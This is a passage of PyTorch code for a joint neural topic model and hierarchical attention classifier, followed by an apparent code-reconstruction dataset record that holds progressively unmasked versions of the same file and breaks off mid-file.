p_x_given_h = F.softmax(self.de(r))
return p_x_given_h
def init_rnn_hidden(self, batch_size, level):
param_data = next(self.parameters()).data
if level == "word":
bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1
layer_size = self.word_rnn_num_layer * bidirectional_multipier
word_rnn_init_hidden = param_data.new(layer_size, batch_size, self.word_rnn_size).zero_()
return word_rnn_init_hidden
elif level == "context":
bidirectional_multipier = 2 if self.context_rnn_bidirectional else 1
layer_size = self.context_rnn_num_layer * bidirectional_multipier
context_rnn_init_hidden = param_data.new(layer_size, batch_size, self.context_rnn_size).zero_()
return context_rnn_init_hidden
else:
raise Exception("level must be 'word' or 'context'")
def continuous_parameters(self):
for name, param in self.named_parameters():
if not name.startswith("selector"):
yield param
def discrete_parameters(self):
for name, param in self.named_parameters():
if name.startswith("selector"):
yield param
def forward(self, x, x_indices, input_list, length_list, cuda):
###topic model
mean, logvar = self.encoder(x) # batchsize*50
h = self.sampler(mean, logvar, cuda) # batchsize*50
r = self.generator(h) # batchsize*50
p_x_given_h = self.decoder(r) # batchsize*dv
###HAN
        num_utterance = len(input_list)  # number of utterances in each document of this batch
_, batch_size = input_list[0].size()
# word-level rnn
word_rnn_hidden = self.init_rnn_hidden(batch_size, level="word")
word_rnn_output_list = []
word_attention_dict = {}
# de_weight = torch.zeros(self.d_v, self.d_t).cuda()
# de_weight.copy_(self.de.weight.data)
for utterance_index in range(num_utterance):
word_rnn_input = self.embedding(input_list[utterance_index])
word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input, word_rnn_hidden)
word_attention_weight = self.word_conv_attention_linear(word_rnn_output)
# word_attention_weight = Variable(torch.zeros(word_attention_weight.size()).cuda())
batch_data = input_list[utterance_index]
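            # cache a topic-attention vector per vocabulary id, averaging with the previously stored value on repeats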
            for word_i in range(len(batch_data)): # position within the padded utterance
                for clause_i in range(len(batch_data[word_i])): # index of the document within the batch
                    word_index = int(batch_data[word_i, clause_i]) # vocabulary id of this token
if word_index < self.d_v:
if word_index in word_attention_dict:
word_attention_dict[word_index] = (word_attention_dict[word_index] + word_attention_weight[word_i, clause_i,:]) / 2
else:
word_attention_dict[word_index] = word_attention_weight[word_i, clause_i, :]
##HAN
word_attention_weight = self.word_conv_attention_linear2(word_attention_weight)
word_attention_weight = nn.functional.relu(word_attention_weight)
word_attention_weight = nn.functional.softmax(word_attention_weight, dim=0)
word_rnn_last_output = torch.mul(word_rnn_output, word_attention_weight).sum(dim=0)
word_rnn_output_list.append(word_rnn_last_output)
word_rnn_hidden = word_rnn_hidden.detach()
# context-level rnn
context_rnn_hidden = self.init_rnn_hidden(batch_size, level="context")
context_rnn_input = torch.stack(word_rnn_output_list, dim=0)
context_rnn_output, context_rnn_hidden = self.context_rnn(context_rnn_input, context_rnn_hidden)
context_attention_weight = self.context_conv_attention_linear(context_rnn_output)
context_attention_weight = nn.functional.relu(context_attention_weight)
context_attention_weight = nn.functional.softmax(context_attention_weight, dim=0)
context_rnn_last_output = torch.mul(context_rnn_output, context_attention_weight).sum(dim=0)
classifier_input = context_rnn_last_output
logit = self.classifier(classifier_input)
return mean, logvar, p_x_given_h, logit, word_attention_dict
|
normal
|
{
"blob_id": "4f3e297b6925f8d65aacaa59bb837e746747c33f",
"index": 2608,
"step-1": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n <mask token>\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = 
F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n <mask token>\n <mask token>\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n <mask token>\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = 
F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n <mask token>\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n 
temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith('selector'):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-4": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif 
self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n\n def decoder(self, r):\n p_x_given_h = F.softmax(self.de(r))\n return p_x_given_h\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith('selector'):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n\n def forward(self, x, x_indices, input_list, length_list, cuda):\n mean, logvar = self.encoder(x)\n h = self.sampler(mean, logvar, cuda)\n r = self.generator(h)\n p_x_given_h = self.decoder(r)\n num_utterance = len(input_list)\n _, batch_size = input_list[0].size()\n word_rnn_hidden = self.init_rnn_hidden(batch_size, level='word')\n word_rnn_output_list = []\n word_attention_dict = {}\n for utterance_index in range(num_utterance):\n word_rnn_input = self.embedding(input_list[utterance_index])\n word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input,\n word_rnn_hidden)\n word_attention_weight = self.word_conv_attention_linear(\n word_rnn_output)\n batch_data = input_list[utterance_index]\n for word_i in range(len(batch_data)):\n for clause_i in range(len(batch_data[word_i])):\n word_index = int(batch_data[word_i, clause_i])\n if word_index < self.d_v:\n if word_index in word_attention_dict:\n word_attention_dict[word_index] = (\n word_attention_dict[word_index] +\n word_attention_weight[word_i, clause_i, :]) / 2\n else:\n word_attention_dict[word_index\n ] = word_attention_weight[word_i, clause_i, :]\n word_attention_weight = self.word_conv_attention_linear2(\n word_attention_weight)\n word_attention_weight = nn.functional.relu(word_attention_weight)\n word_attention_weight = nn.functional.softmax(word_attention_weight\n , dim=0)\n word_rnn_last_output = torch.mul(word_rnn_output,\n word_attention_weight).sum(dim=0)\n word_rnn_output_list.append(word_rnn_last_output)\n word_rnn_hidden = word_rnn_hidden.detach()\n context_rnn_hidden = self.init_rnn_hidden(batch_size, level='context')\n context_rnn_input = torch.stack(word_rnn_output_list, dim=0)\n context_rnn_output, context_rnn_hidden = self.context_rnn(\n context_rnn_input, context_rnn_hidden)\n 
context_attention_weight = self.context_conv_attention_linear(\n context_rnn_output)\n context_attention_weight = nn.functional.relu(context_attention_weight)\n context_attention_weight = nn.functional.softmax(\n context_attention_weight, dim=0)\n context_rnn_last_output = torch.mul(context_rnn_output,\n context_attention_weight).sum(dim=0)\n classifier_input = context_rnn_last_output\n logit = self.classifier(classifier_input)\n return mean, logvar, p_x_given_h, logit, word_attention_dict\n",
"step-5": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nclass JointModel(nn.Module):\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,encoder_shortcut, generator_shortcut, generator_transform,\n num_word, emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout, word_rnn_bidirectional,word_attention_size,\n context_rnn_size, context_rnn_num_layer, context_rnn_dropout, context_rnn_bidirectional,context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n\n super(JointModel, self).__init__()\n\n ##NGTM:\n self.d_v = d_v # vocabulary size\n self.d_e = d_e # dimensionality of encoder\n self.d_t = d_t # number of topics\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform # transform to apply after the generator\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n # self.mean_bn = nn.BatchNorm1d(self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n # self.logvar_bn = nn.BatchNorm1d(self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n # self.de_bn = nn.BatchNorm1d(self.d_v)\n\n ##HAN:\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=word_rnn_size, dropout=word_rnn_dropout,\n num_layers=word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = word_rnn_size * 2 if word_rnn_bidirectional else word_rnn_size\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size, self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size, hidden_size=context_rnn_size,dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=context_rnn_bidirectional)\n context_rnn_output_size = context_rnn_size * 2 if context_rnn_bidirectional else context_rnn_size\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size, 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size, mlp_size),\n nn.LeakyReLU(),\n nn.Linear(mlp_size, num_label),\n nn.Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(pretrained_embedding)\n\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n\n # mean = self.mean_bn(self.mean_fc(pi))\n # logvar = self.logvar_bn(self.logvar_fc(pi))\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = 
torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n# temp = self.generator1(h)\n# if self.generator_shortcut:\n# r = F.tanh(temp) + h\n# else:\n# r = temp\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n\n def decoder(self, r):\n # p_x_given_h = F.softmax(self.de_bn(self.de(r)))\n p_x_given_h = F.softmax(self.de(r))\n return p_x_given_h\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == \"word\":\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size, self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == \"context\":\n bidirectional_multipier = 2 if 